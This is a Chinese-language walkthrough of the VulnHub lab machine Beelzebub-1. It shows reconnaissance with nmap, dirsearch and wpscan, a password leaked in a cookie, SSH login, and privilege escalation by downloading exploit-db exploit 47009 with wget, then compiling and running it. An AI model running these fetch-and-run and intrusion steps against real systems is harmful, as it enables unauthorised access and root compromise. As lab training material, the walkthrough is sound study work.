『vulnhub系列』BEELZEBUB- 1

下载地址:

1
https://www.vulnhub.com/entry/beelzebub-1,742/

信息搜集:

使用nmap扫描存活主机,发现主机开启了22和80端口

1
nmap 192.168.0.*

Untitled

访问80端口的web服务,发现是apache的默认页面

Untitled

使用dirsearch扫描目录

1
dirsearch -u "http://192.168.0.140/"

Untitled

发现存在phpmyadmin等页面,访问index.php页面,发现是404 /login也是一样

Untitled

感觉有猫腻,查看一下源代码,果然发现一行提示

1
2
<!--My heart was encrypted, "beelzebub" somehow hacked and decoded it.-md5-->
#我的心被加密了,"beelzebub"不知如何被入侵了,并且被解密了 md5

Untitled

大概的意思是本来是被加密的,后来被用md5解密了,现在我们使用md5加密一下

1
d18e1e22becbd915b45e0e655429d487

然后当作目录扫描一下

1
dirsearch -u "http://192.168.0.140/d18e1e22becbd915b45e0e655429d487"

Untitled

然后我们发现是个Wordpress 网站,里面有登录页面(这里靶机换了ip变为192.168.0.128

Untitled

还有一个文件上传的目录页面

Untitled

点开Talk To VALAK 发现是个带有输入框的页面

Untitled

随便输入一个数据,查看cookie 多出来一个Password 值为M4k3Ad3a1

Untitled

因为是Wordpress页面,因此可以使用工具wpscan

使用命令:

1
wpscan --url=http://192.168.0.128/d18e1e22becbd915b45e0e655429d487/ --ignore-main-redirect --force -e --plugins-detection aggressive
  • –ignore-main-redirect 忽略重定向扫描目标
  • –force 不检查是否运行wordpress
  • -e –enumerate 枚举,默认枚举所有插件,备份
  • –plugins-detection aggressive 使用提供的模式枚举插件 默认被动(passvie)可选:混合(mix)被动(passvie)主动(aggressive)

扫描到用户valakkrampus 我们使用这两个用户名和密码M4k3Ad3a1进行登录

Untitled

因为wordpress页面跳转有些问题,我们使用ssh登录,使用krampus登录成功

Untitled

权限提升:

进入系统后,使用命令ls -la 发现有两个文件很可疑

Untitled

但是.sudo_as_admin_successful 大小为0所以我们直接看.bash_history可以看到命令历史

然后我们发现有一个wgetgcc编译命令,我们照着运行

Untitled

1
2
3
4
5
6
7
wget https://www.exploit-db.com/download/47009

mv 47009 ./exploit.c

gcc exploit.c -o 1

./1

Untitled

成果:

Untitled